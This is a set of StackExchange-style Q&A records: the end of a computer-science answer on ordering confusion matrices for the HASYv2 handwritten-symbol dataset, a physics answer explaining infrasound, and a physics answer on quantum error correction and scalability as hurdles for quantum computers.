'\multimap', '\L', '+', '\nearrow', '\boxplus', 'F', 'E', 'Q', '\checked', '\checkmark', '\rceil', 'h', '\uparrow',
'\div', '\doteq', '\longmapsto', '\mapsto', '\pitchfork', '\boxdot',
'\varsubsetneq', '\subsetneq', '\nsubseteq', '\nRightarrow', '\gtrless', '\triangleq', '\parr', '\Sigma', '\sum', 'k', '\sharp', '\#', '\sun', '\ast', '\star', '\not\equiv', '\neq', '\rightleftarrows',
'\rightleftharpoons', '\rightrightarrows', '\Longrightarrow', '\Rightarrow', '\pm',
'\dots', '\dotsc', '\aa', ']', '\ohm', '\Omega',
'\exists', '\ni', '3', '\}', '\pounds', '\mathscr{L}', '\mathcal{L}',
'\twoheadrightarrow', '\shortrightarrow', '\rightarrow', '\longrightarrow',
'\nrightarrow', '\rightharpoonup', '\hookrightarrow', '\cong', '\equiv',
'\Xi', '\diamondsuit', '\lozenge', '\diamond', 'V', '\vee', 'v', '2', '\sphericalangle', '\simeq', '\approx', '\gtrsim', '\nu', '\forall', '\triangleright',
'D', '\mathcal{D}', '\mathscr{D}',
'\barwedge', '\sqrt{}', '\iota', 'L', '\lfloor', '\{', '\coprod', '\amalg', '\sqcup', '\mp', '\between', '\mathds{E}', '\mathcal{F}', '\mathscr{F}', 'J', 'f', '\fint', '\S', '\mathsection', '\Im', '\nexists', '\mathfrak{X}', '\hbar', '\dag', '\nmid', '\vdash', '\notin', '\lightning', '\xi', '\zeta', '\mathcal{E}', '\varepsilon', '\epsilon', '\in', '\mathscr{E}', 'n', 'e', '\varrho', '\eta', '\mathscr{S}', '\int', '\square', '\sqcap', '\prod', '\Pi', '\pi', '\models', '\vDash', 'P', '\mathcal{P}', '\rho', '[', '\lceil', '\llbracket', '\Gamma', 'r', 'c', 'C', '\subset',
'\mathcal{C}', '\Lambda', '\wedge', '\mathds{C}', '\varpropto', '\infty', '\propto', '\alpha', '\ae', 'p', '\mathds{P}', '\gamma', '\mathscr{P}',
'\wp', '\mathscr{C}', '\varphi', '\triangledown', '\nabla', '\diameter',
'\o', '\varnothing', '\emptyset', '\O', '\phi', '\Phi', '\tau',
'\mathcal{T}', '\top', 'T', '\oint', '\celsius', '\%', '\rrbracket', '\frown', '\cap', '\curvearrowright', '\clubsuit', '\psi', '\Psi', '\mathbb{1}', '\mathds{1}', '1', '\trianglelefteq', '\ell', '\lambda',
'\kappa', '\varkappa', '\mathcal{X}', '\chi', '\vartriangle', '\Delta',
'\triangle', 'x', '\times', 'X', '\aleph', '\mathscr{H}', '\mathcal{H}',
'\rtimes', 'H', '\$', '\vartheta', '\astrosun', '\odot',
'\|', '\parallel', '\angle', '/', '\prime', '\circledcirc', '8', '\leftmoon',
'\ltimes', '\prec', '\preceq', '\sqsubseteq', '\subseteq', '\female',
'\venus', '\omega', 'j', '\setminus', '\backslash', '\Bowtie', '\bowtie',
'a', '6', '\delta', '\partial', 'd', '\supseteq', '\succ', '\succeq',
'\geq', '\geqslant', '\searrow', '\leq', '\leqslant', '\lesssim',
'\preccurlyeq', '\circledR', '\sigma', '\mars', '\male', '\mathbb{H}',
'\mathfrak{A}',
'\mathcal{N}', 'N', 'b', '\flat', '\mathds{N}', '\mathbb{N}', '\mu', '\mathcal{M}', 'M',
'\circledast', '\otimes',
'\oplus', '\ss', '\beta', '\mathcal{B}', 'B', '\mathfrak{S}', '\&',
'\with', 'G', '\copyright', '4', '\mathds{Q}', '\mathbb{Q}', '\theta',
'\Theta', '\ominus', '<', '\langle', '\heartsuit', '\blacksquare',
'\bullet', '\cdot', '\circlearrowright', '\mathcal{O}', '\degree',
'\circ', '\fullmoon', 'o', '\circlearrowleft', '0', 'O',
'\mathbb{R}', '\mathds{R}', '\Re', '\mathcal{R}', 'R',
'm', '\mathfrak{M}', '>', '\rangle', '\cup', 'U', '\sim', '\backsim', 'w', 'W', '\lhd', '\triangleleft', '\AA', '\mathscr{A}', '\mathcal{A}', 'A', '\varoiint', '\oiint', '\asymp', 'K', '-', '\mathcal{U}', 'u', 'i', '\varpi', 'S',
'\mathcal{S}', 's', '5', '\leftarrow', '\mapsfrom', '\neg', 'g', '9',
'\mathcal{G}', '\dashv', 'q',
'\leadsto', '\rightsquigarrow', '\leftrightarrow', '\Leftrightarrow', '\Longleftrightarrow',
'\wr', 'z', '\mathcal{Z}', '\mathds{Z}', '\mathbb{Z}', 'Z',
'l', '|', '\mid', 'I', '\downarrow',
'y', 'Y', '\rfloor', '\supset', '\Downarrow', '\uplus', '\Vdash', '\upharpoonright']
As expected, this method automatically finds groups of classes which are similar, such as 'D', '\mathcal{D}', '\mathscr{D}'.
It leads to the following confusion matrix:
Thoughs about good solutions / minima
This optimization problem will most likely get the best results if all groups of similar classes are together. For this dataset, the groups are D-shaped, O-shaped, arrow-shaped, ...
For a good classifier, it is expected that there are many errors between members of a group and few (even none) between groups. Hence the ordering of groups does not matter (much).
If the classifier can distinguish many classes really well, a lot of groups exist. If there are $k$ groups, there will be $k!$ solutions to the confusion matrix optimization problem which will have almost the same score. For the HASYv2 dataset and the CNN classifier I expect there to be at least 50 groups (hence $50! \approx 10^{64}$ similar solutions which are all close to the minima / minimum. | {
"domain": "cs.stackexchange",
"id": 8412,
"tags": "optimization, matrices"
} |
Will there be a sound if we oscillate something at more than 10Hz? | Question: We all know that we hear sound due to vibration in air. So I was wondering if we make an oscillator which does not make any internal sound, but it oscillates at more than 20Hz will we able to hear any sound due to those vibrations in the air (assuming amplitude is loud enough that we can hear)?
Answer: Yes, it will be a sound generated if we oscillate something in the air in the frequency range of $[0.1-20]\text{Hz}$. It's called infrasound. The thing that people can't hear infrasound, doesn't invalidate it being a sound. Though, some animals can hear and produce infrasound as well. Such as Sumatran rhinoceros which produce sounds with frequencies as low as 3 Hz, or alligators which are known to use infrasound to communicate over distances. | {
"domain": "physics.stackexchange",
"id": 94731,
"tags": "acoustics, frequency"
} |
ROS Answers SE migration: URDF Guide | Question:
Dear ROS users,
please, give me a hint, where I could find some guide to United Robot Description Format (UDRF)?
Cheers!
Originally posted by ASMIK2011ROS on ROS Answers with karma: 62 on 2011-04-25
Post score: 1
Original comments
Comment by mjcarroll on 2011-04-25:
I was half-way working on a "real-life" example, but never finished, maybe this is motivation to.
Answer:
The best place to start is probably the URDF tutorials list
Originally posted by JeffRousseau with karma: 1607 on 2011-04-25
This answer was ACCEPTED on the original site
Post score: 8 | {
"domain": "robotics.stackexchange",
"id": 5438,
"tags": "urdf"
} |
Momentum space representation and time dependency | Question: I'm currently struggling with understanding how to find the momentum-representation of a wave function and I could need some help with understanding this. I know from varying sources that the Fourier-transform is an important key of understanding and computing this.
I have one proposed way of finding the momentum representation and that involes "de Broglie's momentum–wavelength relation" where we can express $\vec{p}$ as $\hbar$$\vec{k}$. Let's study the given wave function:
$$\Psi(\vec{k}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i\vec{k}\vec{r}}\psi(\vec{r})$$
If I were to substitute $\vec{k}$ with $\frac{\vec{p}}{\hbar}$ (de Broglie relation), then we would get the following function:
$$\Psi(\frac{\vec{p}}{\hbar}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i\frac{\vec{p}}{\hbar}\vec{r}}\psi(\vec{r})$$
My thought is that I can now express the momentum representation of $\Psi(\vec{k})$ as $$\Phi(\vec{p}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i\frac{\vec{p}}{\hbar}\vec{r}}\psi(\vec{r})$$ where I have combined $\vec{p}$ with $\hbar$ as it now only depends on $\vec{p}$ with a factor of constant $\hbar^{-1}$
Are these assumptions that I've made correct, and if not, how can I instead think to make it correct?
If I would want to determine $\Psi(\vec{k},t)$ at a time $t > 0$, could I just plug in the term $\omega t$ into the exponential, like this:
$$\Psi(\vec{k}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i(\vec{k}\vec{r}-\vec{\omega}t)}\psi(\vec{r}))$$
Same question here, are my assumptions correct, and if not, how can I think differently to solve this? Thank you.
Answer: For the first point, you are basically right, the only trouble being the normalisation. Here, assuming the position-space wavefunction is normalized :
$$\int \text d^3\vec x |\psi(\vec x)|^2 = 1$$
we know that its Fourier transform (with the convention used in OP) is normalized as well :
$$\int \text d^3 \vec k|\Psi(\vec k)|^2 = 1$$
Then, to give a normalized momentum-space wavefunction $\Phi(\vec p)$, we need an extra factor of $\hbar^{-3/2}$ :
\begin{align}
\Phi(\vec p) &= \frac{1}{\hbar^{3/2}}\Psi(\vec p/\hbar) \\
&= \frac{1}{(2\pi\hbar)^{3/2}}\int\text d^3 x e^{-i \vec p\cdot\vec x/\hbar }\psi(\vec x)
\end{align}
For the second point, the relation between the position-space wavefunction and the momentum-space wavefunction at the same time $t$ is always the same :
$$\Phi(\vec p,t)= \frac{1}{(2\pi\hbar)^{3/2}}\int\text d^3 x e^{-i \vec p\cdot\vec x/\hbar }\psi(\vec x,t)$$
ie we only take the spatial Fourier transform.
Up to this moment, we were only dealing with kinematics. To relate the wave-functions at different times, we need to specify the dynamics of the system, which is done by choosing a Hamiltonian operator. For a free non-relativistic particle, whose Hamiltonian is $H = -\frac{\hbar ^2 }{2m} \nabla^2$, we see that the Schrödinger equation implies that the momentum-space wavefunction satisfies :
$$i\hbar \partial_t\Phi(\vec p,t) = \frac{p^2}{2m}\Phi(\vec p,t)$$
This is solved by :
$$\Phi(\vec p,t) = e^{-iE_p t/\hbar} \Phi(\vec p,0)$$
with $E_p = \hbar \omega_p = \frac{p^2}{2m}$. Plugging back in the definition of $\Phi(\vec p,0)$, we obtain :
$$\Phi(\vec p,t ) = \frac{1}{(2\pi\hbar)^{3/2}} \int \text dx e^{i(\vec p \cdot \vec x - E_p t)/\hbar} \psi(\vec x,0)$$ | {
"domain": "physics.stackexchange",
"id": 95100,
"tags": "quantum-mechanics, homework-and-exercises, fourier-transform"
} |
Time Dilation In Between Two Objects | Question: Suppose an object A is exactly halfway in between two identical objects B and C, so the magnitude of the cumulative acceleration on object A is $0$. Objects A, B, and C have no velocity relative to each other. Will the time dilation for object A be the same as if there was one object with the mass of objects B and C combined, or the same as if objects B and C did not exist?
Answer: Gravitational time dilation is not caused by acceleration. In most situations it is related to how deep the gravitational potential well is.
So if two stars are orbiting you at a distance $d$ you will experience more gravitational time dilation than if you were a distance $d$ away from just one of them.
So the time dilation is cumulative.
Thus there will not be zero time dilation and it will generally be as strong as if there was one larger mass nearby. | {
"domain": "physics.stackexchange",
"id": 24509,
"tags": "general-relativity, time-dilation"
} |
Point Cloud Filtering and processing using PCL is slow | Question:
Hi All
I have code for a ROS node that subscribes to A PointCloud2 topic published by iai_kinect2's kinect bridge. My problem is that the code runs quite slowly. I have narrowed down the slowing-down to my spinOnce() statement, so I'm pretty sure it's my callback function that's being slow. However, my callback is using the reccommended way of converting the pc2 message into a PCL point cloud. Here it is for reference:
void cloudCallback(const sensor_msgs::PointCloud2ConstPtr& msg){
// Create a container for the data.
pcl::PCLPointCloud2 pcl_pc2;
pcl_conversions::toPCL(*msg,pcl_pc2);
pcl::fromPCLPointCloud2(pcl_pc2,*cloud);
pcl::removeNaNFromPointCloud(*cloud,*outputCloud, indices);
sor.setInputCloud(outputCloud);
sor.setLeafSize (0.01f, 0.01f, 0.01f);
sor.filter (*outputCloudFilt);
}
All the objects used here were pre-initialised before main(). The code runs just as slowly if I remove the filtering from the callback.
I should also add that the speed is slow independently of how many points are in the cloud.
EDIT: Using fromROSMsg() doesn't help with my problem.
Originally posted by christophecricket on ROS Answers with karma: 21 on 2020-03-24
Post score: 0
Original comments
Comment by gvdhoorn on 2020-03-24:
Something to check: did you compile with optimisations enabled?
And not an answer, but pcl_ros comes with a few PCL filters wrapped in nodelets: wiki/pcl_ros - Nodelets.
Comment by stevemacenski on 2020-03-24:
Also, please give us your full code, for all we know the issue is somewhere over there. Also please describe what "slow" means to you. Give us some metrics to work with.
Comment by christophecricket on 2020-03-24:
Yeah fair enough. I meant that my code was running at like 0.1Hz, which is way slower than you would actually expect.
Answer:
Thanks @gvdhoorn turning on compiler optimisation gives me speeds more in line with what I expect (~20-30Hz, and actually scales with the size of the cloud). To anyone else experiencing this problem: set the following flag in catkin_make:
-DCMAKE_BUILD_TYPE=Release
Originally posted by christophecricket with karma: 21 on 2020-03-24
This answer was ACCEPTED on the original site
Post score: 2
Original comments
Comment by stevemacenski on 2020-03-24:
Sounds about right! Was this for setting in your application or in your PCL/PCL ROS build itself?
Comment by christophecricket on 2020-03-25:
I just turned it on for the entirety of the packages in my src/ folder.
Comment by stevemacenski on 2020-03-25:
And what’s in that? PCL, pcl_perception? Just your application code?
Comment by christophecricket on 2020-03-25:
Oooh I just got what you're trying to ask. No it's just my application code. I didn't recompile the binaries for PCL or ROS.
Comment by stevemacenski on 2020-03-25:
ah ok,thanks | {
"domain": "robotics.stackexchange",
"id": 34629,
"tags": "ros-melodic"
} |
Time Dilation Effects from simply being on a spinning planet orbiting a star in a rotating galaxy in an expanding universe. | Question: I am a layman, so take this with a grain of salt.
I saw a TV show the other day which showed a Russian Cosmonaut who had spent more time in space than any other human. The relativistic effects of the low gravity and extreme speeds at which he had spent a decent part of his life had pushed him a small, but surprisingly non-trivial fraction of a second into the "future" as compared to the rest of us observers here on earth. I want to say it was something like a 50th of a second.
What, if any, are the relativistic effects all of us experience in an average lifespan simply by being on the earth as it travels through space in orbit and as the galaxy rotates and the universe expands.
By effects I mean as compared to a hypothetical observer who is able to remain completely motionless in space? Is it even measurable?
I know gravity is not being taken into account, so is this question even answerable?
Thanks for your patience with my question.
Answer: As the comments say, you have to be precise about your reference point when you talk about time dilation. Time dilation is always relative to something else.
But there is an obvious interpretation to your question. Suppose you have an observer well outside the Solar system and stationary with respect to the Sun. For that observer your clock on Earth is ticking slowly for two reasons:
you're in a gravitional well so there is gravitational time dilation.
you're on the Earth which is hurtling round the Sun at about (it varies with position in the orbit) 30 km/sec. The Earth's surface is also moving as the Earth rotates, but the maximum velocity (at the equator) is only 0.46 km/sec so it's small compared to the orbital velocity and we'll ignore it.
As it happens the problem of combined gravitational and Lotentz time dilation has been treated in the question How does time dilate in a gravitational field having a relative velocity of v with the field?, but this has some heavy maths so let's do a simplified calculation here.
The gravitational time dilation, i.e. the factor that time slows relative to the observer outside the Solar System is:
$$ \frac{t}{t_0} = \sqrt{1 - \frac{2GM}{rc^2}} $$
where $M$ is the mass of the object and $r$ is the distance from it.
For the Sun $M = 1.9891 \times 10^{30}$ kilograms and $r$ (the orbital radius of the Earth) $\approx 1.5 \times 10^{11}$ so the time dilation factor is $0.99999999017$.
For the Earth $M = 5.97219 \times 10^{24}$ kilograms and $r$ (the radius of the Earth) $\approx 6.4 \times 10^{6}$ so the time dilation factor is $0.999999999305$.
The Lorentz factor due to the Earth's orbital motion is:
$$\begin{align}
\frac{1}{\gamma} &= \sqrt{1 - v^2/c^2} \\
&= 0.999999995
\end{align}$$
And to a first approximation we can simply multiply all these factors together to get the total time dilation factor:
$$ \frac{t}{t_0} = 0.999999984 $$
To put this into context, in a lifetime of three score and ten you on Earth would age about 34 seconds less than the observer watching from outside. | {
"domain": "physics.stackexchange",
"id": 12044,
"tags": "general-relativity, time"
} |
tf2: I can broadcast transfroms but I cannot listen to them. I keep getting [ERROR] : Lookup would require extrapolation | Question:
Hello
I am trying to do a simple broadcast/listen of tf2 where I broadcast a frame and then listen to it and transform a point in that frame. However, the broadcasting script is working as intended but I cannot listen to it and I keep getting:
[ERROR] [1607460129.073986]: Lookup would require extrapolation 0.009213686s into the past. Requested time 1607460126.067262173 but the earliest data is at time 1607460126.076475859, when looking up transform from frame [base_laser] to frame [base_link]
Here are the two scripts:
Broadcaster:
import rospy
import tf2_ros
import geometry_msgs.msg
from tf.transformations import *
import tf_conversions
if __name__ == "__main__":
rospy.init_node('tf2_turtle_broadcaster')
rate = rospy.Rate(100)
while not rospy.is_shutdown():
broadcaster = tf2_ros.TransformBroadcaster()
t = geometry_msgs.msg.TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = "base_link"
t.child_frame_id = "base_laser"
t.transform.rotation = geometry_msgs.msg.Quaternion(0, 0, 0, 1)
t.transform.translation = geometry_msgs.msg.Vector3(0.1, 0, 0.2)
broadcaster.sendTransform(t)
rate.sleep()
Listener:
import rospy
import tf2_ros
import geometry_msgs.msg
from tf2_geometry_msgs import PointStamped
from tf.transformations import *
if __name__ == "__main__":
rospy.init_node('robot_tf_listener')
laser_point = PointStamped()
laser_point.header.stamp = rospy.Time.now()
laser_point.header.frame_id = "base_laser"
laser_point.point.x = 1
laser_point.point.y = 0.2
laser_point.point.z = 0
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
try:
rospy.loginfo('1')
tran = tfBuffer.transform(laser_point, "base_link", timeout=rospy.Duration(3))
rospy.loginfo('2')
except Exception as e:
rospy.logerr(e)
rate.sleep()
Originally posted by Forenkazan on ROS Answers with karma: 23 on 2020-12-08
Post score: 0
Original comments
Comment by jayess on 2020-12-08:
Are you using two different machines? If so, this may have to do with the machines not having their clocks synced. See the network setup on the wiki.
Answer:
Use Time(0) instead of Time.now(). For more detail, check out the following: http://wiki.ros.org/tf/Tutorials/tf%20and%20Time%20(Python)
Originally posted by apawlica with karma: 46 on 2020-12-08
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by jayess on 2020-12-08:
The op is using tf2 and the tutorial that you're linking to is the deprecated tf package.
Comment by apawlica on 2020-12-08:
Wouldn't the relevant bit (using Time(0) instead of Time.now()) still be applicable, as it's a timing issue and not unique to tf2?
Comment by jayess on 2020-12-08:
See this answer | {
"domain": "robotics.stackexchange",
"id": 35851,
"tags": "ros, python, transform, tf2"
} |
Job Scheduling Algorithm | Question: Changed Program based on suggestions. New Code: Job Scheduling Algorithm 2
I have created an algorithm for job scheduling. The algorithm goes through sub-lists in order with two nested for loops. Inside the nested for loops, the algorithm counts how many tasks for each job are completed. If this is equal to the number of tasks, then the profit for that job is added to the total profit.
Item start to Item end is an item using that machine from start to end. Machine start to Machine end is when the machines can process the items. A single task is a single machine doing items. The number required for a job is tasks to be completed while done tasks are tasks that will finish in the schedule. If those two counts are equal then the job is done, and profit is added to the profit var.
Here is the code
def output_profit(profit:int)->None:
print("profit: " + str(profit), end = "\n")
def output_subset(subset:[str])->None:
for item in subset:
print(str(item), end = " ")
def main():
items = ["a", "b"]
items_starts = [0, 3]
items_ends = [2, 4]
#total number of tasks that are needed for job i
tasks_to_complete = [1,1]
#tasks that are done for job i
done_tasks = [0, 0]
machine_starts = [0, 0]
machine_ends = [1, 7]
profits_for_job = [10, 12]
profit = 0
for row in range(0, len(items)):
for col in range(0, len(items) + 1):
subset = items[row:col]
for job_index in range(0, len(subset)):
if items_starts[job_index] >= machine_starts[job_index]:
if items_ends[job_index] <= machine_ends[job_index]:
done_tasks[job_index] = done_tasks[job_index] + 1
profit = 0
for job_index in range(0, len(subset)):
if tasks_to_complete[job_index] == done_tasks[job_index]:
profit = profit + profits_for_job[job_index]
output_profit(profit)
output_subset(subset)
if __name__ == "__main__":
main()
I am looking for ways to improve the code readability and improve the algorithm's efficiency.
Answer: Functions
It's good that you're thinking about how to capture code in functions, but you haven't particularly chosen the right code to move into functions.
This is somewhat trivial:
print("profit: " + str(profit), end = "\n")
and does not deserve its own function; simply write
print(f'profit: {profit}')
at the outer level. The same applies for output_subset, which does not need a loop and can be
print(' '.join(item for item in subset))
Instead, something that does deserve to be in a separate function is your set of loops starting at for row, which can be translated into a generator; also note that 0 is the default start for range:
ProfitPair = Tuple[
int,
List[str],
]
def get_profits( ... variables needed for iteration ...) -> Iterable[ProfitPair]:
for row in range(len(items)):
for col in range(len(items) + 1):
subset = items[row:col]
for job_index in range(len(subset)):
if items_starts[job_index] >= machine_starts[job_index]:
if items_ends[job_index] <= machine_ends[job_index]:
done_tasks[job_index] = done_tasks[job_index] + 1
profit = 0
for job_index in range(len(subset)):
if tasks_to_complete[job_index] == done_tasks[job_index]:
profit += profits_for_job[job_index]
yield (profit, subset)
Type hints
It's good that you've tried this out. subset:[str] should be subset: List[str].
Indexing
for row in range(0, len(items)):
for col in range(0, len(items) + 1):
subset = items[row:col]
seems strange to me. Based on your initialization, items is not a two-dimensional (nested) list - unless you count string indexing as the second dimension. row and col are thus somewhat misnamed, and are basically start and end.
In-place addition
done_tasks[job_index] = done_tasks[job_index] + 1
should be
done_tasks[job_index] += 1
Summation with generators
profit = 0
for job_index in range(0, len(subset)):
if tasks_to_complete[job_index] == done_tasks[job_index]:
profit = profit + profits_for_job[job_index]
can be
profit = sum(
profits_for_job[job_index]
for job_index in range(len(subset))
if tasks_to_complete[job_index] == done_tasks[job_index]
)
This raises another point, though. Consider "rotating" your data structure so that, instead of multiple sequences where the same index in each correspond to a description of the same thing, e.g.
profits_for_job[job_index]
tasks_to_complete[job_index]
done_tasks[job_index]
instead have a sequence of @dataclasses with attributes:
job[job_index].profits
job[job_index].tasks_to_complete
job[job_index].tasks_done
Predicate combination
if items_starts[job_index] >= machine_starts[job_index]:
if items_ends[job_index] <= machine_ends[job_index]:
done_tasks[job_index] = done_tasks[job_index] + 1
can just be
if (
items_starts[job_index] >= machine_starts[job_index] and
items_ends[job_index] <= machine_ends[job_index]
):
done_tasks[job_index] += 1 | {
"domain": "codereview.stackexchange",
"id": 39832,
"tags": "performance, algorithm, python-3.x"
} |
Acids used in Friedel-Crafts alkylation | Question: I am learning adding alkyl groups to benzene using Fridel-Crafts alkylation:
I know that it is very common to use $\ce{AlCl3/AlBr3}$ as Lewis acid catalyst in this reaction. But I am just wondering whether I can use a Bronsted acid, e.g., $\ce{H2SO4}$, as the catalyst or not. For example, in a $\mathrm{E1}$ or hydration reaction, $\ce{H2SO4}$ is added to alkene or alcohol, respectively, forming a carbocation, which is the same ultimate result when $\ce{AlCl3}$ is used (make the alkyl group more electrophilic).
I am thinking $\ce{AlCl3}$ is the only way if I am adding primary alkyl halide since in $\mathrm{E1}$/hydration reactions, an actual primary carbocation is impossible to be formed (too unstable), while it exists in a complex with $\ce{AlCl3}$ (not entirely a carbocation, so can be formed).
SO, what is the problem with secondary/tertiary alcohols if I use the Bronstad acid? If there is a problem, way? Both Lewis and Bronsted acid ways will lead to carbocation rearrangements (I have not learnt the acylation).
Answer: Brønsted Acid has been used in Friedel-Crafts alkylation before (for example, Ref.1). According to this reference, when toluene use as the solvent, the F-C alkylation reaction of toluene is fruitful for tertiary and secondary alkyl bromides, tosylates, and alkenes (which give both carbocations upon protonation). However, the only primary bromide, which worked in this alkylation are benzyl and cinnamyl bromides. Other active primary bromides such as allyl and crotonyl bromides gave ditolyl products (e.g., crotyl group substituted first, then underwent double bond protonation followed by hydride shift to give secondary benzyl carbocation, which then reacted with the second toluene nucleus to give 1,1-ditolylbutane). Keep in mind that these reactions worked only with activated phenyl nucleus. For example, chlorobenzene gave only trace of products even with higher temperatures.
Later, this reaction is successfully used in Tandem-Friedel-Crafts alkylation reactions to synthesize hitherto unknown perylene derivatives (Ref.2):
References:
Mathew P. D. Mahindaratne, Kandatege Wimalasena, "Detailed Characterization of p-Toluenesulfonic Acid Monohydrate as a Convenient, Recoverable, Safe, and Selective Catalyst for Alkylation of the Aromatic Nucleus," J. Org. Chem. 1998, 63(9), 2858–2866 (https://doi.org/10.1021/jo971832r).
Mark A. Penick, Mathew P. D. Mahindaratne, Robert D. Gutierrez, Terrill D. Smith, Edward R. T. Tiekink, George R. Negrete, "Tandem Friedel–Crafts Annulation to Novel Perylene Analogues," J. Org. Chem. 2008, 73(16), 6378–6381 (https://doi.org/10.1021/jo800558c)(PDF). | {
"domain": "chemistry.stackexchange",
"id": 14313,
"tags": "organic-chemistry, reaction-mechanism, carbocation, electrophilic-substitution"
} |
Why isn't the n factor/valency factor in a disproportionation reaction = twice the number of electrons in a single half reaction? | Question: I was reading the first answer to Equivalent weight in case of disproportionation reaction there it is said
Take a disproportionation reaction:- $\ce{nA -> xB + $(n - x)$C}$ where A is being oxidised to B and rest reduced to C. Also let $n_1$ and $n_2$ be the n factors of A to B and C respectively
We have 2 equations: one by conservation of electrons,
$$\begin{align*}
n_1 x &= n_2(n - x) \\[7pt]
\implies x &= \frac{n_2\cdot n}{n_1 + n_2}
\end{align*}$$
and the other from the definition of $n$-factor:
$$\begin{align*}
n_f &= \frac{\text{moles of electrons transferred}}{\text{moles of reactant}} \\
&= \frac{n_1 x}{n} \\
&= \frac{n_1 n_2}{n_1 + n_2}
\end{align*}$$
In the second last line $n_f = \frac{n_1x}{n}$ shouldn't it be $\frac{n_1x+n_2(n-x)}{n}$ which is equal to $\frac{2n_1n_2}{n_1 + n_2}$ by expanding?
The reason for my thinking is because equivalent is defined as the weight of a substance that reacts with an arbitrary amount of another substance (eg:- 1g H). Hydrogen can both supply and take electrons therefore both the oxidation and reduction half reactions of A can take place with H and so I'm reasoning that n factor = adding up the electrons for both oxidation and reduction half reactions
Answer: If one insists on the formal usage of the n-factor and equivalent weight on disproportionation reactions (for which it is not intended), one must accept the fact the compound has simultaneously two n-factors (which can be incidentally equal):
one as the oxidant
one as the reductant.
Then the procedure is the same as for ordinary redox reactions where oxidants and reductants are different molecular entities.
But as Ivan and others have suggested, using n-factors for similar cases is rather useless and just complicates things. Be aware that the N-factor, equivalent, gram-equivalent and equivalent weight are obsolete concepts that should be taught only as what they are and how they were used.
The disproportionation redox reaction
$$\ce{n A -> x B + $(n - x)$C}$$
or alternatively written with small natural numbers $i,j$ as
$$\ce{$(i + j)$ A -> i B + j C}$$
is better to rewrite for easier analysis to 2 redox half-reactions:
\begin{align}
\ce{ i A &-> i B + n e-} \\
\ce{ j A + n e- &-> j C}
\end{align}
Then for n-factors of A as oxidant resp. reductant:
\begin{align}
n_\mathrm{f,A,ox} = \frac{n}{j} \tag{oxidant}\\
n_\mathrm{f,A,red} = \frac{n}{i} \tag{reductant}
\end{align}
It could be better understood if we reverse the reaction:
$$\ce{i B + j C -> $(i + j)$ A }$$ | {
"domain": "chemistry.stackexchange",
"id": 17636,
"tags": "redox"
} |
rock paper scissors game simplify in Python | Question: I wrote rock paper scissors game using what I have learnt yet.It is while,for statements,list,tuple,dictionary and such simple things only.So I am interested how can I simplify this code using only what I have learnt(simple things)
Here is code
k = input("Hello guys what are you names: ")
j = input("and yours? ")
print(f"""ok {k} and {j} let the game begin!"
P.s. Type exit to quit game""")
list = ["rock","paper","scissors"]
while True:
a_player = input(f"{k} choose: rock, scissors, paper : ").lower()
if a_player == "exit":
break
b_player = input(f"{j} choose: rock, scissors, paper: ").lower()
if b_player == "exit":
break
for type in list:
if a_player == type and b_player==type:
print(" Draw guys, draw")
break
if b_player != list[1] and b_player!=list[0] and b_player!=list[2] or (a_player != list[1] and a_player != list[0] and a_player != list[2]) :
print("Please type correctly")
if a_player == list[1]:
if b_player == list[0]:
print(f" {k} wins: paper beats rock")
elif b_player ==list[2] :
print(f"{j} wins: scissors beat paper")
elif a_player == list[2]:
if b_player == list[0]:
print(f"{j} wins: rock beats scissors")
elif b_player == list[1]:
print(f"{k} wins: scissors beat paper")
elif a_player == list[0]:
if b_player == list[2]:
print(f"{k} wins: rock beats scissors")
elif b_player==list[1]:
print(f"{j} wins: paper beats rock")
Answer: I'm new to this community, but I'll give this my best shot:
Avoid single letter variable names. Names like k and j convey little about what values they represent, so replace them with something like:
a_player_name = input("Hello guys what are you names: ")
b_player_name = input("and yours? ")
This code:
a_player = input(f"{k} choose: rock, scissors, paper : ").lower()
creates the need to catch errors down the line and is repeated so I recommend replacing it with:
def input_choices(string):
while True:
choice = input(string)
if choice.lower() in list:
return choice
else:
print('Please type correctly')
a_player = input_choices(f"{k} choose: rock, scissors, paper : ")
This avoids the need for:
if b_player != list[1] and b_player!=list[0] and b_player!=list[2] or (a_player != list[1] and a_player != list[0] and a_player != list[2]) :
print("Please type correctly")
Which I hope you agree is a vast improvement. Remember you can always format conditionals like this to improve readablity:
if (
b_player != list[0] and b_player != list[1] and b_player != list[2]
or a_player != list[1] and a_player != list[0] and a_player != list[2]
):
print("Please type correctly")
Or even better use the in keyword
if (
a_player not in list
or b_player not in list
):
print("Please type correctly")
As for the actual rock-paper-scissors logic:
if a_player == list[1]:
if b_player == list[0]:
print(f" {k} wins: paper beats rock")
elif b_player ==list[2] :
print(f"{j} wins: scissors beat paper")
elif a_player == list[2]:
if b_player == list[0]:
print(f"{j} wins: rock beats scissors")
elif b_player == list[1]:
print(f"{k} wins: scissors beat paper")
elif a_player == list[0]:
if b_player == list[2]:
print(f"{k} wins: rock beats scissors")
elif b_player==list[1]:
print(f"{j} wins: paper beats rock")
I'm sure this can be improved with table-driven logic, but I'm sure there's no end of examples for you to skim through in the 'Related' tab.
Hope that helped :) | {
"domain": "codereview.stackexchange",
"id": 38327,
"tags": "python"
} |
what breakthrough Physics needs to make quantum computers work? | Question: I read some posts on this forum and some articles which repeatedly state that it is not impossible to build q-comps but to make it successful, physics needs a great breakthrough.
I tried finding but most of the material talks about how it works and what are current limitations, but how physics is going to help solving it?
Can somebody please explain precisely 'what is that breakthrough?'.
Answer: It can be argued that there are two primary challenges associated with quantum computing. One is a coding challenge, and the other is a purely mechanical (or in some minds physical) challenge.
As Ron indicated, viable Quantum Error Correction Code (QECC) is probably the largest breakthrough that makes quantum computers possible. Peter Shor was the first to demonstrate a viable Quantum Error Correction Code that can also be characterized as a Decoherence Free Subspace.
At this point, it can be argued that most of the problems associated with Fault Tolerant Quantum Computing are resolvable in terms of theory. However, their is a question of scaling as it relates to the number of qubits that are required to make the system viable, and the physical size of the system that is required to support those qubits. Most arguments that say there is a needed breakthrough in physics can be traced to this question of scalability.
